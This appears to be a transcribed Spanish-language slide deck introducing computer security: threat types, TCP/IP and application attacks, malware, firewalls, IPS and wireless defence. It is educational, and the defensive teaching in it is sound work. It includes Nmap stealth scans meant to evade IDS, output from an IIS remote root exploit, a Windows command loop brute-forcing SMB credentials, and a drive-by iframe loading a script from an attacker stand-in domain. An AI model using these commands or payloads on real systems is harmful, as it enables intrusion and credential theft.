Introduccion a la Seguridad informatica

La confianza es la mejor conexiónLa confianza es la mejor conexión

La confianza es la mejor conexión

• INTRODUCCION A LA

SEGURIDAD INFORMATICA

• TIPOS DE AMENAZAS

• AMENAZAS TCP/IP

• AMENAZAS DE APLICACIÓN

• MALWARE

• RECESO

• ING SOCIAL

• TIPOS DE FIREWALL

• TIPOS DE IPS

• HEURISTICA Y AV

• SEGURIDAD WIRELESS

TEMARIO


SEGURIDAD INFORMÁTICA


CONFIDENCIALIDAD

INTEGRIDAD

DISPONIBILIDAD (Aviability)

CARACTERISTICAS DE UN SISTEMA SEGURO(CIA)


ANÁLISIS DE RIESGOS


The Open Source Security Testing

Methodology Manual

OSSTMM

Es posible bajar el manual en español:

http://en.wikipedia.org/w/index.php?title=The_Open_Source_Security_Testing_Methodology_Manual&action=edit&redlink=1


SEGURIDAD EN PROFUNDIDAD


AMENAZAS DE RED


TIPOS DE AMENAZAS

MALWAREINFILTRACION

DDOS ATTACK

ROBO DE INFO. Phishing FRAUDES

SPAM


• LAMERS

• USUARIO INTERNO

TIPOS DE ATACANTES

“Si conoces al enemigo y a ti mismo,

no debes de temer por los resultados

de cientos de batallas” Sun Tsu


Vulnerabilidad y Exploit

Es la debilidad o hueco en un sistema por el cual un atacante puede utilizar

algún método para explotarla.

Un exploit es aquel proceso o software que ataca

una vulnerabilidad particular de un sistema o

aplicación.


CICLO DEL HACKING


RECONOCIMIENTO


Información Inicial enumeración

[bash]$ nslookupDefault Server: dns2.acme.netAddress: 10.10.20.2

>> set type=any>> IBW.COM

http://www.borderware.com/

http://network-tools.com/

http://network-tools.com/


Enumeración de Servicios


Es el proceso de crear un perfil completo de los recursos IT del objetivo. Internet,

Intranet, accesos remotos, extranet y Miscelaneos.

Footprinting

Search String Potential Result

c:\winnt Turns up servers with pages that

reference the

standard NT/2000 system folder

c:\inetpub Reveals servers with pages that

reference the

standard NT/2000 Internet services root

folder

TSWeb/default.htm Identifi es Windows

Server 2003 Terminal Services

accessible via browser-embedded ActiveX

control


2

1

Encapsulámiento de Paquete TCP/IP

La data es envia sobre el stack de capas

Cada capa adiciona su header

22Bytes 20Bytes 20Bytes 4Bytes

64 to 1500 Bytes


TCP HANDSHAKE

22

PC PC

TCP State TCP StateTCP Packet

Closed

SYN-sent

ACK-received

Established Established

SYN-received

ACK-sent

Listen

SEQ = 1000, CTL = SYN

SEQ = 750, ACK = 1001, CTL = SYN | ACK

SEQ = 1000, ACK = 751, CTL = ACK


Sniffer


EXPLORACION DE RED


Uso de NMAP www.nmap.org

Es un escaneador de puertos (Port Scanner) - nos indica que puertos están

abiertos en una dirección IP. Es herramienta de línea de comando, se puede

instalar en Windows o Linux.

Los atacantes lo usan para descubrir que puertos tenemos abiertos en nuestros

equipos.

Importante recordar que cada puerto es un punto de ingreso al sistema por lo

cual tenemos que es asegurarnos que solo los puertos necesarios están abiertos

en nuestros servidores en la DMZ.

Tenemos que usar Nmap de regularmente y fijar que puertos tenemos abiertos.

Existen varios escaneadores de puertos, Nmap es el mas popular por su

variedad de comandos



Nmap 10.0.0.1 Nmap escaneara el IP 10.0.0.1,si no se le indica que puertos escanear nmap

escaneara 900 puertos mas populares.

• Nmap –p 80 www.cisco.comcon la opción –p indicamos el puerto. Nmap verificara si puerto 80 esta abierto

en www.cisco.com

• NMAP –p 80,21,1433 10.0.0.1/24

nmap escaneara todo el rango 10.0.0.1/24 y verificara si los puertos 80,21,1433

estan abiertos en cada IP.

http://www.cisco.com/




Nmap –sS –p 80 www.cisco.com

Nmap no enviara el tercer paquete (ACK) de esa forma no se complete el 3 Way

Handshake y no se establece la conexión. De esa forma el atacante intenta

ocultar el escaneo de puertos para no ser detectado por el Admin del servidor.

esta opción de escaneo se usa también para evitar detección por un IDS/IPS




Nmap –T0 -p 80,21,1433 www.cisco.com

Para evitar detección por un IPS/IDS se puede controlar la

velocidad que Nmap envié los SYN ,se puede configurar

- T 0-5 cuando el 0 es el mas lento, NMAP esperara 5

minutos entre cada envio de paquete SYN la opción 5 es

la mas rápida por defecto Nmap escanee –T3 si no se

menciona ninguna opción de velocidad.



30

Ataques de RED (L2/3/4)

Denial of Service (DoS)SYN flood

Smurf

Distributed DoS

SpoofingIP spoofing

ARP poisoning

Web spoofing

DNS spoofing


Sniffer

• La existencia de un sniffer en la red interna o la DMZ puede

indicar que el servidor fue comprometido o que un empleado esta

capturando informacion en la red interna que no le corresponde.

• Uno de los primeros pasos que va hacer un hacker despues que

compromete un servidor sera instalar un sniffer local


SPOOFING Y SOURCE RoutingEl origen de un dirección IP puede ser cambiadoAddress spoofing

Usando direccion fuente para autenticaciónr-utilities (rlogin, rsh, rhosts etc..)

Internet

2.1.1.1 C

1.1.1.1 1.1.1.2A B

1.1.1.3 S

• A dice ser B para el server S?

• Spoofing

• C pasar por B para el server

S?

•Source Routing


Ejemplo de robo de sesión (Session Hijack)

Alice Bob

Eve

Soy Bob! Soy

Alice!

1. Eve se convierte en hombre en medio a través de algun mecanismo. Por Ejemplo: Arp Poisoning, social engineering, router hacking etc...

2. Eve puede monitorear tráfico entre Alice y Bob sin modificar secuencias ni parametros.

3. Eve puede asumir la identidad de Bob o Alice a traves de hacer Ip Spoofing. Esto rompe la pseudo conexción a medida que Eve comienze a modificar el número de secuencia


Denegación de servicio(DoS)

(DDoS)

Objectivo Deniega algún servico corriendo enuna máquina, usualmente se realiza haciendosobrecarga en el server o RED

Consumo de recursos del HostTCP SYN floodsICMP ECHO (ping) floods

Consumo de ancho de bandaUDP floodsICMP floods


35

Ping de la muerte

El atacante envia paquetes ilegales de eco con mas bytes de lo permitido, causando fragmentación de datos. El exceso de datos guardados causa buffer overflows, kernel dumps, y Bloqueos de sistema.Esto se hace posible por ciertos Windows OSs quepermiten non-standard ICMP (Internet Control Message Protocol)El largo del paquete máximo ICMP es 65507 bytes. Cualquier paquete de eco que lo exceda causa fragmentacion y el receptor trata de reconstruir el paquete almacenandolo en buffer hasta desbordarlo.


Ping Flood

Sistema atacante

Internet

Broadcast

Enabled

Network

Victima


•SYN FLOOD ATTACK

TIPOS DE DENEGACION DE SERVICIO


Ataque de DDoSServer

Atacante

Usuarios Legítimos

Interweb

Ips comprometidas

Service Requests

Conexiones Flood del atacante

Cola del Server llena, Deniega servicio a los

usuarios legítimos

Clientes solicitando Servicios


ATAQUE DE SMURF


40

UDP-flood attack

Variante de DoS

Envia a la maquina viCtima servcios de eco(haciendo Spoofing) para crear

loops infinitos entre dos Servicios UDP

No se requiere tener una cuenta basta con la conectividad.

Ip source= victimip, ip destination192.168.1.255

Ip source 10.0.1.2 ip dest]=10.0.1.3


Ataques de capa de aplicación


Un overflow es, básicamente, cuando resguardamos espacio de memoria

insuficiente para una variable y le introducimos más datos a de los que puede

soportar. La variable "desborda", y los datos que no caben

sobrescriben memoria continua a dicha variable.

Ejemplo: Declaramos 8bytes

Insertamos 10bytes

2 bytes restantes sobre rescriben la memoria contigua a dicha variable

BUFFER OVERFLOW


Denegación de servicio (aplicación o sistema)

Inyección de código de manera estructurada sobre una aplicación o sistema

de manera que tome control de algún shell msdos , terminal, remote desktop.

Ataques Buffer Overflow

C:\>iisexploit www.site.com myserver 8082

THCIISSLame v0.3 - IIS 5.0 SSL remote root

exploit

tested on Windows 2000 Server german/english

SP4

by Johnny Cyberpunk ([email protected])

[*] building buffer

[*] connecting the target

[*] exploit send

[*] waiting for shell

[*] Exploit successful ! Have fun !


Es una forma especializada de validación de entradas

que intenta manipular la base de datos de la aplicación

lanzando sentencias SQL codificadas a dicha aplicación

aprovechando vulnerabilidades de la programación.

INYECCION SQL


Es la vulnerabilidad mas comun de los sitios Web!

Es una brecha en el desarrollo del sitio Web no es un problema de la base de

datos o del Server Muchos programadores lo pasan desapercibido.

Muchas aplicaciones reconstruyen los queries con concatenación de caracteres.

Los programadores no hacen validación de entradas según el campo.

Inyección SQL


Cross-Site Scripting (XSS)

Brinda oportunidades de ingeniería social para los phishers

Generalmente se usa en conjunto con ataques DbD

En Abril, la Fundación Apache fue hackeada con XSS

Cross-Site Scripting (XSS): En general, una técnica de ataque que permite al atacante ejecutar un script en la computadora de la víctima bajo el contexto de otro sitio web que la víctima confía. Este ataque explota la confianza que el usuario tiene por un sitio particular.


ATAQUES XSSXSS Vulnerabilidad que afecta un Sever pero la victima final son los usuarios

El atacante injecta

Javascript en submit

El usuario se loguea y corre el

script en el submit

El servidor responde

con el scriptEl javascript se ejecuta

en el bwoser del user

El browser del usuario envia el

token de la session al atacante

El atacante roba la session del

usuario


Ataques de Diccionario

Ataques de Fuerza bruta

Ataques de Autenticación

C:\>FOR /F "tokens=1,2*"

%i in (credentials.txt)^

More? do net use

\\victim.com\IPC$ %j

/u:victim.com\%i^

More? 2>\>nul^

More? && echo %time%

%date% >\> outfile.txt^

More? && echo

\\victim.com acct: %i pass:

%j >\> outfile.txt


Ataques de autenticación Fuerza Bruta


Drive-by Downloads (DbD)

DbDs, ahora más destacado que lasamenazas nacidas en el e-mail

Los criminales venden y soportan esquemasde ataques web fáciles de usar

Sophos encuentra cerca de 30,000 nuevossitios maliciosos cada día

Drive-by download (DbD): Es cuando el malware es bajado por la fuerza en su computadora sin su conocimiento o interacción. Tipicamente ocurre cuando un sitio maliciosos explota una vulnerabilidad de seguridad basada en el browser para forzar a su computadora a ejecutar código que baja malware.


Ataques Web Combinados

DBDB

Parte 1: Ataque automatizado SQL InjectionParte 2: Drive-by Download

<iframe><script src=“http://EvilWebSite.cn/EvilJavaScript.js”></scirpt></iframe>


•Proceso manual o automatizado que trata de encontrar

vulnerabilidades en una red o servicio.

•Puede ser hasta del tipo intrusivo y aplicar exploit al

sistema escaneado.

•Herramienta de gran ayuda al administrador de red pero

maligno en manos de terceros (HACKERS).

ESCANEO DE VULNERABILIDADES


Ataque de Dia Cero

Ventana de Vulnerabilidad


MalwareMalicious softwareSoftware malicioso

Algunos tipos de Malware: Adware Troyano Dialer Hijacker Keylogger Phishing Spam Spyware Ventanas emergentes Virus Worms o gusanos ...

Lo más común es que aparezcan combinados

54

Clasificación del Malware


Tipos de Virus

Polymorfico: Usa un motor polymorfico para mutar en su codigo mientras

mantiene intacto su algoritmo original (packer)

Methamorfico : Cambia después de cada infección

MalwareHost infectado

Executable

Packer

Payload


Malware Worms o gusanos

¿Qué es? Programa autoreplicante que no altera los archivos del sistema sino que reside en la memoria y se duplica a sí mismo enviándose por email o a través de la red.

¿Cómo se evita? Teniendo activo el firewall Actualizando windows regularmente. Comprobando que el antivirus está actualizado y activo.

56


La palabra Adware nace de la contracción de las palabras Advertising Software (publicidad no solicitada).

Despliega publicidad sobre productos y/o servicios a través de pop-ups o barras que se adhieren a los navegadores. Doubleclick, Cydoor, Gator Corporation.

Clasificación del Malware

Malware Adware

¿Qué es? Software que durante su funcionamiento muestra publicidad de distintos productos o servicios.

¿Cómo se evita? No usar software de dudoso origen No visitar páginas web de dudoso origen.


Los troyanos simulan ser inofensivos, útiles y benignos pero en realidad esconden funcionalidades maliciosas.

Suelen acceder a la computadora simulando ser la demo del anticipo de algún juego, en un mensaje de correo electrónico e incluso mediante aplicaciones de mensajeria instantánea

Malware Troyano

¿Qué es?• Software dañino disfrazado de software legítimo que permite que un extraño controle nuestro PC.

¿Cómo se evita? No usar SW de dudoso origen Escanear con el antivirus cualquier dato o programa recibido. Comprobar que el antivirus está actualizado y activo.


Tipos de troyanos

Troyano backdoor: habilita un canal de acceso no convencional en el sistema permitiendo que otros códigos maliciosos y/o personas accedan al mismo cuantas veces quieran.

Troyano drooper: se caracteriza por ejecutar otros códigos maliciosos al momento de su ejecución.

Troyano keylogger: monitorea y registra todo lo que se teclea. Muchos de ellos poseen la capacidad de capturar imágenes y videos.

Troyano bancario: orientados a la ejecución de ataques de phishing. Manipulan a la víctima para que de manera “voluntaria” brinden información sensible. En muchos casos realizan pharming local.

Troyano downloader: se caracteriza por descargar otros códigos maliciosos mientras se encuentra activo.

Troyano bot: convierte una computadora en zombi. Cada una de estas computadoras zombis formarán parte de redes botnet.


Ejemplos de troyanos y gusanos


Rootkits

Rootkits pueden esconder virtualmente todo:

Procesos

Files, directories, Registry keys

Servicioss, drivers

TCP/IP ports

rootkit technology:

User-mode hooking

Kernel-mode hooking

Codigos de Parche

Escondidos sobre otros procesos


El Spyware (Spy Software) tiene como objetivo recolectar información sobre una persona u organización. Crea perfiles de usuarios con información sobre sus hábitos de navegación.

La información se distribuye a empresas publicitarias u organizaciones interesadas. Bonzo Buddy, Alexa, Hotbar.

Los programas Rogue son aplicaciones del tipo shareware que simulan ser herramientas de seguridad e instalan adware y/o spyware.

Despliegan alertas exageradas sobre supuestas infecciones incentivando al usuario a adquirir dicha aplicación.


Botnets: Lo último en amenazas mezcladas

Distributed Denial of Service (DDoS)

Spamming

Phishing

Click Fraud

Robo de ID (a escala masiva)

Password Distribuido/hash cracking

Instalar malware adicional

Acceso de Puerta Trasera

Keylogging / espiar a la víctima

Robar credenciales

Proxy a través de la víctima

Apalancamiento en la mayoría de ataques

Los Botnets son la Navaja Suiza

del mundo del malware, y los que

los usan tienen muchas hojas de

donde escoger.


Zeus v3 (Zbot), Mpack, Zunker

• Viene como un kit de crimeware pre-empaquetado

• Muy orientado a ataques bancarios en linea

• Roba credenciales de Bancos y RedesSociales

• Genera páginas de phishing localmente (web page injection)

• Responsable de muchos ataques de malware

• Algunos estiman que ha infectado a 1 de cada 100 computadoras

• Chequee: https://zeustracker.abuse.ch


ATAQUE DE INGENIERIA SOCIAL


Ingeniería Social

“Usted puede tener la mejor tecnología, los mejores firewalls, los mejores sistemas de detección de intrusos o los mejores dispositivos biométricros. Lo único que se necesita es un llamado a un empleado desprevenido e ingresar sin más”

Kevin D. Mitnick


PISHING


Malware e Ing.Social combinados en Facebook (Koobface)


lEs una especie de Hacking y Phishing avanzada en el que se envenenan los registros de servers DNS o los registros Host de la PC

•http://google.com

•Sever Google.com

•Server Fraudulento

•Flujo Normal a la ip de Google

•Resolución envenenada hacia Ip del server de Fraude

PHARMING


Ing. Social y Falso Antivirus(rogue)


AMENAZAS PERSITENTES AVANZADAS

An Advanced Persistant Threat (APT).

Three APT

Atributos:1. Avanzada

2. Persistente

3. Polymorfa

4. Focalizadas


SEGURIDAD DE PERIMETRO

• Filtrado de paquetes (Mínimo y básico)

• Firewalls

• Filtro de contenido (Web y correo)

• Antimalware

• IPS

• NGF

• UTM

• WAF


¿Dónde opera un Firewall?

Punto de conexión de la red interna con la red exterior

Zona Desmilitarizada (DMZ)


Tipos de Política de Entrada(Filtros INGRESS) y Salida (Filtros EGRESS)

Los filtros de salida o Egress son métodos de filtrar tráfico desde

la red interna hacia afuera o hacia redes externas (LAN hacia WAN).

Los filtros de entrada o Ingress son métodos de filtrar tráfico

desde las redes externas hacia las redes internas (WAN hacia LAN).


Políticas de Filtrado de

Paquetes de Estado (Stateful)

Siguen el rastro de las sesiones de los paquetes TCP,rastreo de origen, destino de direcciones y puertos.Evita robo de sesion, spoofing y conexiones anormalesen tcp utilizadas por escaneos.

Mantiene el control del estado de sesiones TCP/UDPincluyendo el re-ensamble de paquetes tcp e icmp. Nopermitiendo el paso de ataques fragmentados queexploten a la hora de unirlos.(Ej ping de la muerte oalgun tipo buffer overflow).

Soporta autenticación y timeouts de sesiones.


Ejemplo de Filtrado de Paquetes de Estado


Politicas Stateful Inspection

En la mayoria de las comunicaciones TCP (normales), lascomputadoras inician lo que es llamado “3-way handshake (TCP)”

Hola mi nombre es Pedro(SYN)

Hola Pedro, mi nombre es Jose (SYN/ACK)

Mandame tus datos (ACK)

Un firewall “Stateful” inspection monitorea estas conexiones

NO LOS DATOS, solo la información de las conexiones

client.com.4567 > server.com.21: S 1234567890:1234567890(0)server.com.21 > client.com.4567: S 3242456789:3242456789(0) ack1234567890client.com.4567 > server.com.21: . ack 1


Conexión anormal en un Filtro de Estado

A stateful inspection firewall “inspects” the “handshake”

Adios Jose, mi nombre es Pedro (END)

Hola Pedro, mi nombre es Jose (SYN)

Adios Pedro, mi nombre es Jose (End)

Si hay algo anormal en la comunicación,

el firewall bota o ignora la conexión.


FILTRADO PUERTAS TRASERAS

Solo se debe abrir los puertos necesarios a través del fw.

Solo se permite puerto DNS a los destinos confiables


Limitantes de los Filtros de Estado

No logran revisar el contenido de la aplicación delpaquete en su totalidad

No detienen exploits basados en anomalias deprotocolos de capa de aplicación como HTTP y FTP(Buffer overfolw sobre aplicacion o headers anómalos)

Son más eficientes pero menos proactivos a la hora dedetener un ataque de dia zero (hasta nivel de capa 4)

No evitan conexiones salientes o entrantes por puertosconocidos como HTTP o POP3 que no hablen dichoprotocolo (conexión de troyanos o botnets que ocupenprotocolos de trabajo como el http,smtp,dns etc)


Políticas de filtrado Alg o Proxy

Actúa dentro de los niveles de transporte yaplicación (circuit level gateway yapplication gateway respectivamente)según el modelo TCP/IP

Procesa, valida y regenera cada paqueterecibido; impidiendo la conexión directaentre 2 redes diferentes

Para cada servicio (telnet, ftp, http...) seutiliza un proxy específico, pudiendo asíprohibir el uso de determinadas órdenesde un servicio

4 Transporte

5 Aplicación

3 IP

2 Data Link

1 Físico1 Físico

Application gateway


Diferencia entre Statefull y Proxy

Firmas de AV/IPS Firmas de AV/IPS


Web Server

Cuando la conexión es a través del Packet Filter

1. La conexión se crea en el cliente

2. Va a través del Firewall

3. La conexión termina en el Server

El firewall monitorea la conexión y aplica las reglas a nivel de capa 3 y 4

Conexión Packet Filter


Web Server

Cuando la conexión es a través del Proxy

1. La conexión es creada en el cliente

2. La conexión termina en el firewall

3. Todos los aspectos de la conexión son revisados

4. Las conexiones creadas en el firewall son re-ensambladas

5. La conexión final se manda al Server

Conexión Application Proxy

El proxy revisa el protocolo a nivel de capa deaplicación; en algunos casos también revisaheaders, comandos, buffers, codificación deaplicaciones, encriptado (HTTPS), descartando loque no es normal a nivel de capa de aplicación.

MAS QUE UN DEEP PACKET INSPECTION


Firewalls de Filtro de Estado

Basados solamente en firmas

5 – Protocolo AnómaloXxysws

Ertws&3

sw@!hd

We*@z!

SW@(f&

8 – Queries DNSA Record

NS

CNAME

SOA

PTR

MX

AAAA

AXFR

Nuevos Exploit s DNS salendiariamente. Proxy los detiene

sin conocer las firmas

Diferencia significativa de Escaneo

Ejemplo de Protección dia ZERO

(DNS Exploit)


Limitantes de los filtros Proxy

Los Proxy no son compatibles con todos los protocolosde red existentes

Hay reducción en el rendimiento del equipo y lasconexiones debido al procesamiento más intenso en elescaneo; sin embargo puede balancearse conincremento de recursos

La configuración del proxy es más dificultosa que unpacket-filter

Algunos proxy no hacen escaneo tan minucioso delprotocolo


Limitantes del Firewall en la seguridad de Perímetro

PORT 80

PORT 443

El ataque es un exploit a

nivel de aplicacion sobre

una vulnerabilidad

La seguridad Perimetral permite

solo puertos de trabajo

Buffer Overflow

Cross-Site Scripting

SQL/OS Injection

Cookie Poisoning

Hidden-Field Manipulation

Parameter Tampering

!Host

comprometido

!Comunicacion

centro de

comandos

Salida de una puerta

Trasera a traves

del firewall

!Acceso

forsado a la

informacionPero esta abierto a

trafico Web y Dns


IPS (Intrusion Prevention System)


IDS =Intrusion Detection System=Pasivo

Cuando detecta ataque solo Alerta

IPS =Intrusion Prevention System=Activo

Cuando detecta un ataque lo Bloquea


•NETWORKS (Recolecta la info de LA RED)

•HOST (Software agente en un Host)

•SIGNATURE DETECTION (Firmas de ataques y Malware)

•ANOMALY or Behavior DETECTION (Detecta patrones anormales

TIPOS de IDS (Intrusion Detection System)

IPS (Intrusion Prevention System)


IDS basados en firmas

CaracteriticasUsa patrones conocidos de firmas para detectar ataquesVentajas?Ampliamente disponibleRapidoFácil de implementarFácil de actulizarDesventajas?

No detecta ataques que no estén

en firmas.


Falsos positivos

.

Falso positivo= detecta trafico normal como ataque.

Falso negativo= no detecta un ataque real.

Los IDS/IPS generan miles de falsos positivos.

Uno de los problemas que vemos en nuestros clientes es que ellos

piensan que los IDS/IPS son como en Anti Virus que no requiere mucho

administracion

Conocemos varias empresas que por tener tantos falsos positivos

Apagaron el equipo y no lo usan mas!!


IDS-IPS basado en Comportamiento

CarateristicasUsa modelos estadísticos o motores de aprendisaje para caracterizar ambientes

normales de uso

Reconoce trafico anormal como intrusiones potencialesVentajas?Podría detectar intentos de nuevos exploit sobre vulnerabilidades sin firma.Puede detectar autorizaciones fuera del patrón normalDesventajas?Generalmente lento, necesita recursos intensivos comparado con el signature-based IDS

Gran flexibilidad, dificultad al configurar

Altos portcentajes de falsos positivos


IPS hibridos

Hoy en dia existen en el mercado IPS’s que

estan basados en firmas y ademas tienen

capacidad de “Anomaly Detection” estos

son los mas caros pero tienen las ventajas

de ambos mundos


•CONSOLA DE ADMINISTRACION: Configura y

• presenta la información recolectada por los sensores.

•SENSORES: Análisis de tráfico y firmas, Alarmas,

• Respuestas y contramedidas.

NETWORK IPS


Network IPS

Internet o Wan

DMZ

LAN Servidores Internos

Segmentación de Red en

zonas

LAN DMZ

SERVER INTERNOS

INTERNET


Host Intrution Detection Systems (HIDS)

los HIDS son agentes que se instalan en los servidores (en

general en la DMZ).

Los HIDS son un complemento de los IDS/IPS. Detectan

cualquier actividad del atacante en el servidor mismo; el HIDS

Alerta si se borraron los logs, si se habilito un nuevo servicio en

el servidor o si creo un muevo usuario en el sistema. Para un

atacante es imposible no ser detectado por el HIDS

**** Tenemos varios clientes que instalan solo los HIDS y no

colocan el NIDS


NGFWsNext Generation Firewall

IPS APPLICATION

CONTROL


FIREWALL UTM

( MANEJO UNIFICADO DE AMENAZAS)

• CONTROL DE APLICACIÓN

• WEB FILTER POR CATEGORIA

• IPS PERIMETRO

• AV PERIMETRO

• REPUTACION DE IP

• VPN

• ANTI SPAM


WAF(Web application Firewall)


ANTI MALWARE


CONSOLA CENTRALIZADA

http://rds.yahoo.com/_ylt=A0WTefghrolMfQUA5L.JzbkF;_ylu=X3oDMTBxYWh2OXMzBHBvcwMyMARzZWMDc3IEdnRpZANJMTI1Xzc1/SIG=1hvvplknb/EXP=1284177825/**http:/images.search.yahoo.com/images/view?back=http://images.search.yahoo.com/search/images?p=cisco+symbol&ei=UTF-8&fr=yfp-t-701&w=600&h=441&imgurl=www.clker.com/cliparts/8/f/9/a/11949856431316298822router_joeseph_teed_01.svg.hi.png&rurl=http://www.clker.com/clipart-3608.html&size=52KB&name=Router+clip+art+...&p=cisco+symbol&oid=8a9ce364995c8fdd31dd8371083687b2&fr2=&no=20&tt=12500&sigr=116cad2f8&sigi=12kbb84nd&sigb=12h5j5rfq

http://rds.yahoo.com/_ylt=A0WTefghrolMfQUA5L.JzbkF;_ylu=X3oDMTBxYWh2OXMzBHBvcwMyMARzZWMDc3IEdnRpZANJMTI1Xzc1/SIG=1hvvplknb/EXP=1284177825/**http:/images.search.yahoo.com/images/view?back=http://images.search.yahoo.com/search/images?p=cisco+symbol&ei=UTF-8&fr=yfp-t-701&w=600&h=441&imgurl=www.clker.com/cliparts/8/f/9/a/11949856431316298822router_joeseph_teed_01.svg.hi.png&rurl=http://www.clker.com/clipart-3608.html&size=52KB&name=Router+clip+art+...&p=cisco+symbol&oid=8a9ce364995c8fdd31dd8371083687b2&fr2=&no=20&tt=12500&sigr=116cad2f8&sigi=12kbb84nd&sigb=12h5j5rfq


HEURISTICA = PROTECCION DIA ZERO

Encontrar una solución por prueba y error o por reglas basadas en la experiencia.


HEURISTICA PASIVA

Su Analiza programas tratando de encontrar código anómalo antes de pasarlo a correr en el proceso central.Busca patrones de

subrutinas,o llamadas de programas que indiquen comportamiento malicioso.


HEURISTICA ACTIVA

Su El motor ejecuta el código en un ambiente Virtual controlado”SandBox”.Analizando los cambios en el entorno virtual.

La Heurística Activa puede detectar código malicioso encriptado, codificado compresión y código polimorfo


Av comparatives test de laboratorio


VIRUS BULLETIN RAP(Reactive Proactive

Reports)


EJEMPLOS DE AMENAZAS DE SEGURIDAD WI-FI


WPA/WPA2/MAC Filter Son esenciales – Pero No son suficiente


CRACK Y EXPLOIT WIRELESS


Autenticación 802.1x


WIPS(WIRELESS INTRUSION PREVENTION SYSTEM)


SEGMENTACIÓN DE TRÁFICO ,

BLOQUEO DE PUERTOS , IPS


WLAN ADMINISTRADA

• Roaming

• Admin Central

• Multiples SSID

• VLAN

• WMM (Voz, Video)

• QoS

• Seguridad

• Monitoreo y logs

• Standarización

• WIPS


Porqué Soluciones Administradas

Algo que sabe(preguntas)

Algo que tiene (tokens, identificaciones, carnets)

Algo que es (biométrica, retina, huellas digitales, voz, etc)

https://howsecureismypassword.net/


VISUALAIZACION DE DATOS


• Casi imposible de identificar factores o patrones clave • Para el personal IT de seguridad de red es un arduo trabajo• Incapacidad para tomar decisiones adecuadas • Falla de cumplimiento de la normativa o regulaciones

GRANDES CANTIDADES DE LOGS DE DATOS

Los datos por si mismo no tienen valor

tangible . El valor lo da el analisis sobre

ellos y como estos datos son

transformados en informacion y

eventualmente en conocimiento.—Mark van Rijmenam


SIEM (Security Information and Event Management)

Security Logging—SANS Survey

Las soluciones SIEM son usuadas para colectar logs de multiples fuentes

•Excelente para usarse en OS, Database, Application, Router, Firewall, UTM

•Los usuarios SIEM reconocen el valor del análisis de datos y correlación de información

•Estos son dificiles de desplegar y gastan tiempo de IT

https://www.sans.org/reading-room/analysts-program/SortingThruNoise

77% 10%24%

https://www.sans.org/reading-room/analysts-program/SortingThruNoise


Le da al administrador un parámetro de

la sanidad de la red.

Nos da información del tráfico que circula

en nuestra red y si tenemos los recursos

apropiados

Nos permite hacer análisis de

congestiones o problemas de la red

Nos permite darnos cuenta quien y que

escanea mi red

"NO PODEMOS CONTROLAR LO QUE NO

VEMOS”

Para que nos sirven las Herramientas de Visualización de

la Red


Cuando los sistemas basados en firmas y heurísticas

han fallado, al final el ser humano ha identificado

las amenazas con herramientas de monitoreo.

Identificación de Amenazas


“Más del 95% de las vulnerabilidades de los firewall son

causadas por mala configuración de los mismos, no por

defectos de los equipos”

-Gartner, 2011


RECOMENDACIONES DE SEGURIDAD

• Establecer Políticas de seguridad

• Establecer sitios de contingencia y backups

• Establecer un plan de desastres y recuperación

• Actualizar firmas y parches

• No dejar abiertos servicios innecesarios

• Contar con tecnología apropiada

• Estar actualizado sobre nuevas amenazas

• Educar a los usuarios en materia de seguridad

• Poseer un plan de seguridad

• No ver los sistemas de seguridad como cajas negras..


Gracias !!!

Introduccion a la Seguridad informatica

Technology

Transcript of Introduccion a la Seguridad informatica